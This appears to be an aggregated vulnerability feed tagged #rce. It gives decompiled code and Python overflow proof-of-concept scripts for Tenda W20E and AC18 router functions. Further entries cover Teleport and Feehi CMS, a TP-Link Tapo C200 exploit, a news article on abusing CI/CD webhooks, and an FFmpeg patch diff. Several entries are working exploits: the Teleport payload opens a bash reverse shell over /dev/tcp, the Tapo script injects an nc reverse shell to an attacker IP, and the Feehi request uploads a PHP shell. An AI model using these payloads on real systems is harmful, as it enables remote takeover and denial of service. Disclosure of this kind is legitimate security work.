Tenda W20E router V15.11.0.6 contains a stack overflow in the function formSetPortMapping with post request 'goform/setPortMapping/'. This vulnerability allows attackers to cause a Denial of Service (DoS) or Remote Code Execution (RCE) via the portMappingServer, portMappingProtocol, portMappingWan, porMappingtInternal, and portMappingExternal parameters.

**\* Tenda W20E stack vulnerability****\* Version**

V15.11.0.6 (US\_W20EV4.0br\_V15.11.0.6(1068\_1546\_841)\_CN\_TDC)

**\* Firmware**

https://www.tenda.com.cn/download/detail-2707.html

**\* Vulnerability Detail**

In function formSetPortMapping, the content obtained by the program from the parameter "portMappingServer", "portMappingProtocol", "portMappingWan", "porMappingtInternal" and "portMappingExternal" are passed to pcVar1, pcVar3, pcVar4, pcVar5, and pcVar6, and then the pcVar1, pcVar3, pcVar4, pcVar5, and pcVar6 are directly copied into the sMibValue stack through the sprintf function. There is no size check, so there is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

void formSetPortMapping(webs\_t wp,char\_t \*path,char\_t \*query)

{
  char \*pcVar1;
  int iVar2;
  char \*pcVar3;
  char \*pcVar4;
  char \*pcVar5;
  char \*pcVar6;
  int iVar7;
  char sNetctlParm \[32\];
  char sMibName \[32\];
  char sMibValue \[256\];
  char\_t \*pWanPortRange;
  char\_t \*pLanPortRange;
  char\_t \*pWanid;
  char\_t \*pProtocl;
  char\_t \*pLanIP;
  char\_t \*pPortMapIndex;
  int iListNum;
  int iPortMapIndex;
  
  memset(sMibValue,0,0x100);

  pcVar1 = websGetVar(wp,"portMappingIndex","");
  iVar2 = atoi(pcVar1);
  if (iVar2 + 1 < 0x15) {
    pcVar1 = websGetVar(wp,"portMappingServer","");
    pcVar3 = websGetVar(wp,"portMappingProtocol","");
    pcVar4 = websGetVar(wp,"portMappingWan","");
    pcVar5 = websGetVar(wp,"porMappingtInternal","");
    pcVar6 = websGetVar(wp,"portMappingExternal","");
    sprintf(sMibValue,"%s;%s;%s;%s;%s;%d",pcVar4,pcVar6,pcVar5,pcVar1,pcVar3,1); //here is overflow
    sprintf(sMibName,"adv.virtualser.list%d",iVar2 + 1);
    SetValue(sMibName,sMibValue);
    GetValue("adv.virtualser.listnum",sMibValue);
    iVar7 = atoi(sMibValue);
    log\_debug\_print("formSetPortMapping",0x52,2,0x41,"index = %d, listnum = %d",iVar2,iVar7);
  ...
}

**\* POC**

import requests

cmd  \= b'portMappingIndex=5&portMappingServer=' + b'A' \* 400 
cmd += b'&portMappingProtocol='+ b'A' \* 400
cmd += b'&portMappingWan='+ b'A' \* 400
cmd += b'&porMappingtInternal=' + b'A' \* 400
cmd += b'&portMappingExterna=' + b'A' \* 400

url \= b"http://192.168.2.2/login/Auth"
payload \= b"http://192.168.2.2/goform/setPortMapping/?" + cmd

data \= {
    "username": "admin",
    "password": "admin",
}

def attack():
    s \= requests.session()
    resp \= s.post(url\=url, data\=data)
    print(resp.content)
    resp \= s.post(url\=payload, data\=data)
    print(resp.content)

attack()

CVE-2022-40855: Router-vuls/formSetPortMapping.md at main · CPSeek/Router-vuls

Tenda W20E router V15.11.0.6 (US_W20EV4.0br_V15.11.0.6(1068_1546_841)_CN_TDC) contains a stack overflow vulnerability in the function formDelDhcpRule with the request /goform/delDhcpRules/

**\* Tenda W20E stack vulnerability****\* Version**

V15.11.0.6 (US\_W20EV4.0br\_V15.11.0.6(1068\_1546\_841)\_CN\_TDC)

**\* Firmware**

https://www.tenda.com.cn/download/detail-2707.html

**\* Vulnerability Detail**

In function formDelDhcpRule, the content obtained by the program from the parameter "delDhcpIndex" is passed to \_\_src, and then the \_\_src is directly copied into the indexs stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

void formDelDhcpRule(webs\_t wp,char \*path,char \*query)

{
  char \*\_\_src;
  int iVar1;
  char msg \[32\];
  char indexs \[128\];
  char \*indexSet;
  
  memset(indexs,0,0x80);
  msg.\_0\_4\_ = 0;
  msg.\_4\_4\_ = 0;
  msg.\_8\_4\_ = 0;
  msg.\_12\_4\_ = 0;
  msg.\_16\_4\_ = 0;
  msg.\_20\_4\_ = 0;
  msg.\_24\_4\_ = 0;
  msg.\_28\_4\_ = 0;
  \_\_src = websGetVar(wp,"delDhcpIndex","0");
  strcpy(indexs,\_\_src); //here is overflow
  delete\_rules\_in\_list("dhcps.static.list",indexs,"\\t");
  iVar1 = CommitCfm();
  if (iVar1 != 0) {
    sprintf(msg,"module\_id=%d,op=%d",3,6);
    send\_msg\_to\_netctrl(3,msg);
  }
  outputToWebs(wp,"1");
  return;
}

**\* POC**

import requests

cmd  \= b'delDhcpIndex=' + b'A' \* 800 

url \= b"http://192.168.2.2/login/Auth"
payload \= b"http://192.168.2.2/goform/delDhcpRules/?" + cmd

data \= {
    "username": "admin",
    "password": "admin",
}

def attack():
    s \= requests.session()
    resp \= s.post(url\=url, data\=data)
    print(resp.content)
    resp \= s.post(url\=payload, data\=data)
    print(resp.content)

attack()

CVE-2022-40868: Router-vuls/formDelDhcpRule.md at main · CPSeek/Router-vuls

Tenda W20E router V15.11.0.6 (US_W20EV4.0br_V15.11.0.6(1068_1546_841)_CN_TDC) contains a stack overflow vulnerability in the function formIPMacBindDel with the request /goform/delIpMacBind/

**\* Tenda W20E stack vulnerability****\* Version**

V15.11.0.6 (US\_W20EV4.0br\_V15.11.0.6(1068\_1546\_841)\_CN\_TDC)

**\* Firmware**

https://www.tenda.com.cn/download/detail-2707.html

**\* Vulnerability Detail**

In function formIPMacBindDel, the content obtained by the program from the parameter "IPMacBindIndex" is passed to \_\_src, and then the \_\_src is directly copied into the indexs stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

void formIPMacBindDel(webs\_t wp,char \*path,char \*query)

{
  char \*\_\_src;
  char msg \[512\];
  char out \[64\];
  char indexs \[128\];
  int i;
  int n;
  char \*indexSet;
  
  memset(indexs,0,0x80);
  out.\_0\_4\_ = 0x31;
  memset(out + 4,0,0x3c);
  msg.\_0\_4\_ = 0;
  memset(msg + 4,0,0x1fc);
  \_\_src = websGetVar(wp,"IPMacBindIndex","0");
  strcpy(indexs,\_\_src); //here is overflow
  delete\_rules\_in\_list("security.ipbind.list",indexs,"\\t");
  sprintf(msg,"op=%d",5);
  send\_msg\_to\_netctrl(0xb,msg);
  CommitCfm();
  outputToWebs(wp,out);
  return;
}

**\* POC**

import requests

cmd  \= b'IPMacBindIndex=' + b'A' \* 800 

url \= b"http://192.168.2.2/login/Auth"
payload \= b"http://192.168.2.2/goform/delIpMacBind/?" + cmd

data \= {
    "username": "admin",
    "password": "admin",
}

def attack():
    s \= requests.session()
    resp \= s.post(url\=url, data\=data)
    print(resp.content)
    resp \= s.post(url\=payload, data\=data)
    print(resp.content)

attack()

CVE-2022-40867: Router-vuls/formIPMacBindDel.md at main · CPSeek/Router-vuls

Tenda AC18 router V15.03.05.19 contains a stack overflow vulnerability in the formSetQosBand->FUN_0007db78 function with the request /goform/SetNetControlList/

**Tenda AC18 stack overflow vulnerability****\* Version**

V15.03.05.19\_multi (ac18\_kf\_V15.03.05.19(6318\_)\_cn.bin)

**\* Firmware**

https://www.tenda.com.cn/download/detail-2683.html

**\* Vulnerability Detail**

In function formSetQosBand->FUN\_0007db78, the content obtained by the program from the parameter "list" is passed to local\_18, and then the local\_18 as param\_1 is passed to function FUN\_0007dd20, then param\_1 (local\_14) is directly copied into the local\_264 stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

void formSetQosBand(undefined4 param\_1)
{
 
  local\_18 = FUN\_0002ba8c(param\_1,"list",&DAT\_000e250c);
  FUN\_0007dd20(local\_18,"bandwidth.mode",L'\\n');
  local\_5c = 0;
 ...
}

undefined4 FUN\_0007db78(char \*param\_1,undefined4 param\_2,byte param\_3)
{
  int iVar1;
  
  char \*local\_20;
  int local\_1c;
  int local\_18;
  char \*local\_14;
  
  memset(auStack100,0,0x40);
  memset(auStack356,0,0x100);
  memset(local\_264,0,0x100);

  memset(auStack1676,0,0x400);

  memset(auStack1964,0,0x100);
  local\_18 = 0;
  local\_1c = 0;
  FUN\_0007db3c();
  local\_14 = param\_1;
  do {
    while( true ) {
      local\_20 = strchr(local\_14,(uint)param\_3);
      if (local\_20 == (char \*)0x0) goto LAB\_0007e0a0;
      local\_1c = 0;
      \*local\_20 = '\\0';
      local\_20 = local\_20 + 1;
      memset(local\_264,0,0x100);
      strcpy(local\_264,local\_14); //here is overflow
      if (local\_264\[0\] == ';') {
        sscanf(local\_264,";%\[^;\];%\[^;\];%\[^;\];%\[^;\];",&local\_26c,&local\_28c,&local\_6ac,&local\_69c);
      }
      else {
        sscanf(local\_264,"%\[^\\r\]\\r%\[^\\r\]\\r%\[^\\r\]\\r%s",auStack1964,&local\_28c,&local\_6ac,&local\_69c);
        local\_1c = 1;
      }

**\* POC**

import requests

cmd  \= b'list=AAAAAAAAAAAA\\n' + b'A' \* 800

url \= b"http://192.168.2.2/login/Auth"
payload \= b"http://192.168.2.2/goform/SetNetControlList/?" + cmd

data \= {
    "username": "admin",
    "password": "admin",
}

def attack():
    s \= requests.session()
    resp \= s.post(url\=url, data\=data)
    print(resp.content)
    resp \= s.post(url\=payload, data\=data)
    print(resp.content)

attack()

CVE-2022-40861: Router-vuls/formSetQosBand.md at main · CPSeek/Router-vuls

The Image Hover Effects Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Title & Description values that can be added to an Image Hover in versions up to, and including, 9.7.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, the plugin only allows administrators access to edit Image Hovers, however, if a site admin makes the plugin's features available to lower privileged users through the 'Who Can Edit?' setting then this can be exploited by those users.

CVE-2022-2937: Vulnerability Advisories - Wordfence

Teleport version 10.1.1 suffers from a remote code execution vulnerability.

    # Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)# Date: 08/01/2022# Exploit Author: Brandon Roach & Brian Landrum# Vendor Homepage: https://goteleport.com# Software Link: https://github.com/gravitational/teleport# Version: < 10.1.2# Tested on: Linux# CVE: CVE-2022-36633Proof of Concept (payload):https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=method=3DiamDecoded payload:"/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #

Teleport 10.1.1 Remote Code Execution

Feehi CMS version 2.1.1 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)# Date: 22-08-2022# Exploit Author: yuyudhn# Vendor Homepage: https://feehi.com/# Software Link: https://github.com/liufee/cms# Version: 2.1.1 (REQUIRED)# Tested on: Linux, Docker# CVE : CVE-2022-34140# Proof of Concept:1. Login using admin account at http://feehi-cms.local/admin2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php# Burp request example:POST /admin/index.php?r=ad%2Fcreate HTTP/1.1Host: feehi-cms.localContent-Length: 1530Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://feehi-cms.localContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://feehi-cms.local/admin/index.php?r=ad%2FcreateAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7DConnection: close------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="_csrf_backend"FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[name]"rce------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[tips]"rce at Ad management------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[input_type]"1------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"Content-Type: image/png<?php phpinfo();------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[link]"--------------

Feehi CMS 2.1.1 Remote Code Execution

TP-Link Tapo c200 version 1.1.15 suffers from a remote code execution vulnerability.

    # Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)# Date: 02/11/2022# Exploit Author: hacefresko# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/# Version: 1.1.15 and below# Tested on: 1.1.11, 1.1.14 and 1.1.15# CVE : CVE-2021-4045# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rceimport requests, urllib3, sys, threading, osurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)PORT = 1337REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version)if len(sys.argv) < 3:    print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>")    exit()victim = sys.argv[1]attacker = sys.argv[2]print("[+] Listening on %d" % PORT)t = threading.Thread(target=os.system, args=(NC_COMMAND,))t.start()print("[+] Serving payload to %s\n" % victim)url = "https://" + victim + ":443/"json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}requests.post(url, json=json, verify=False)

TP-Link Tapo c200 1.1.15 Remote Code Execution

Webhook, line, and sinker

Cloud-based source code management (SCM) platforms support integration with self-hosted CI/CD solutions through webhooks, which is great for DevOps automation.

However, the benefits can come with security trade-offs.

According to new findings from researchers at Cider, malicious actors can abuse webhooks to access internal resources, run remote code execution (RCE), and possibly obtain reverse shell access.

**Webhook IP ranges**

Software-as-a-service (SaaS) SCM systems provide an IP range for their webhooks. Organizations must open their networks to these IP ranges to enable integration between the SCM and their self-hosted CI/CD systems.

“We knew the combination of a SaaS source control management system and a self-managed CI with the webhook service IP range allowed towards the CI is a common architecture, and we wanted to check our possibilities there,” Omer Gil, head of research at Cider, told The Daily Swig.

Catch up on the latest DevSecOps news

Attackers can use webhooks to get past an organization’s firewalls. But SCM webhooks have strict limits, and there is very little room to make modifications to webhook requests.

However, the researchers discovered that with the right changes, they could get beyond the limited endpoints available to SCM webhooks.

**Accessing CI/CD endpoints**

On the CI/CD side, the researchers ran their experiments on Jenkins, an open-source DevOps server.

“We chose Jenkins since it’s self-hosted and commonly used, but \[our findings\] can be applied to any system that is accessible from the SCM, like artifact registries for example,” Gil said.

On the SCM side, they tested both GitHub and GitLab. While webhooks have been designed to trigger specific CI endpoints, they could modify requests to direct them to other endpoints that return user data or the console output of pipelines. Nevertheless, limits remain.

“Webhooks are sent as a POST request, which limits the options against the target service, since endpoints used to retrieve data usually only accept the GET parameter,” Gil said. “While it’s not possible to fire a GET request through GitHub, in GitLab it’s a different case, since if the POST request is responded with a redirection, the GitLab webhook service will follow it with sending the GET request.”

**Exploiting webhooks**

Using GitLab, the researchers were able to use webhooks to combine POST and GET requests to access internal resources. Interestingly, some Jenkins resources are accessible without authentication.

“By default, some resources can be accessed anonymously. Having said that, it’s not very common for an organization to leave it as is – but some do allow anonymous access,” Gil said.

In case authentication was required, the researchers found that they could direct webhooks to the login endpoint and conduct brute-force password attacks against the CI/CD platform. Once authenticated, they obtained a session cookie that could be used to access other resources.

If the Jenkins instance had a vulnerable plugin, the webhook mechanism could exploit it. In the proof-of-concept video above, the researchers show that they could force a vulnerable Jenkins server to download a malicious JAR file, run it on the server, and launch a reverse shell endpoint for the attacker.

This finding is a reminder of the risks created when CI/CD servers are partially open to the internet.

“A hermetic solution is to deny inbound traffic from the SCM webhook service, but it usually comes with engineering costs,” Gil said. “Some countermeasures can be taken, like setting a secure authentication mechanism in the CI, patching, and making sure all actions in the server are saved in the logs.”

RECOMMENDED ‘Security teams often fight against developers taking control’ of AppSec: Tanya Janca on the drive to DevSecOps adoption

CI/CD servers readily breached by abusing&nbsp; SCM webhooks, researchers find

A heap out-of-bounds memory write exists in FFMPEG since version 5.1. The size calculation in `build_open_gop_key_points()` goes through all entries in the loop and adds `sc->ctts_data[i].count` to `sc->sample_offsets_count`. This can lead to an integer overflow resulting in a small allocation with `av_calloc(). An attacker can cause remote code execution via a malicious mp4 file. We recommend upgrading past commit c953baa084607dd1d84c3bfcce3cf6a87c3e6e05

@@ -3967,8 +3967,11 @@ static int build\_open\_gop\_key\_points(AVStream \*st)

  

/\* Build an unrolled index of the samples \*/

sc->sample\_offsets\_count = 0;

for (uint32\_t i = 0; i < sc->ctts\_count; i++)

for (uint32\_t i = 0; i < sc->ctts\_count; i++) {

if (sc->ctts\_data\[i\].count > INT\_MAX - sc->sample\_offsets\_count)

return AVERROR(ENOMEM);

sc->sample\_offsets\_count += sc->ctts\_data\[i\].count;

}

av\_freep(&sc->sample\_offsets);

sc->sample\_offsets = av\_calloc(sc->sample\_offsets\_count, sizeof(\*sc->sample\_offsets));

if (!sc->sample\_offsets)

@@ -3987,8 +3990,11 @@ static int build\_open\_gop\_key\_points(AVStream \*st)

/\* Build a list of open-GOP key samples \*/

sc->open\_key\_samples\_count = 0;

for (uint32\_t i = 0; i < sc->sync\_group\_count; i++)

if (sc->sync\_group\[i\].index == cra\_index)

if (sc->sync\_group\[i\].index == cra\_index) {

if (sc->sync\_group\[i\].count > INT\_MAX - sc->open\_key\_samples\_count)

return AVERROR(ENOMEM);

sc->open\_key\_samples\_count += sc->sync\_group\[i\].count;

}

av\_freep(&sc->open\_key\_samples);

sc->open\_key\_samples = av\_calloc(sc->open\_key\_samples\_count, sizeof(\*sc->open\_key\_samples));

if (!sc->open\_key\_samples)

@@ -3999,6 +4005,8 @@ static int build\_open\_gop\_key\_points(AVStream \*st)

if (sg->index == cra\_index)

for (uint32\_t j = 0; j < sg->count; j++)

sc->open\_key\_samples\[k++\] = sample\_id;

if (sg->count > INT\_MAX - sample\_id)

return AVERROR\_PATCHWELCOME;

sample\_id += sg->count;

}

Tag

#rce